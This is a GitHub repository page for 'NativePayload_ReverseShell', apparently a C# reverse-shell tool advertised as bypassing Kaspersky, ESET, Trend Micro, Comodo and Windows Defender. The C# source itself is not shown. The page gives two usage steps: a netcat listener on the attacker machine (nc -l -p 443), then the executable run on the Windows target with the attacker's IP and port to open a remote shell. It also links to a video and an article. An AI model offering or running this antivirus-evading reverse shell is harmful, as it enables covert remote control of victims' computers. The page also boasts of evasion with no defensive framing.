Skip to content

This is Simple C# Source code to Bypass almost "all" AVS, (kaspersky v19, Eset v12 v13 ,Trend-Micro v16, Comodo & Windows Defender Bypassed via this method Very Simple)

Notifications You must be signed in to change notification settings

DamonMohammadbagher/NativePayload_ReverseShell

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 

Repository files navigation

NativePayload_ReverseShell

This is Simple C# Source code to Bypass almost "all" AVS, (kaspersky v19, Eset v12 v13 ,Trend-Micro v16, Comodo & Windows Defender Bypassed via this method Very Simple)

Note: it is "kind of Reverse shell", Can You Guess "Since When" : This Code Worked & Still Working... ?

//// Step 1 (Linux Side:192.168.56.1)   : nc -l -p 443 

//// Step 2 (Windows Side:192.168.56.x) : NativePayload_ReverseShell.exe 192.168.56.1 443 

Video Step by Step : https://www.youtube.com/watch?v=VkFcy1Dg-pU&feature=youtu.be

Article : https://www.linkedin.com/pulse/bypassing-avs-c-managed-code-reverse-shell-damon-mohammadbagher/

About

This is Simple C# Source code to Bypass almost "all" AVS, (kaspersky v19, Eset v12 v13 ,Trend-Micro v16, Comodo & Windows Defender Bypassed via this method Very Simple)

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages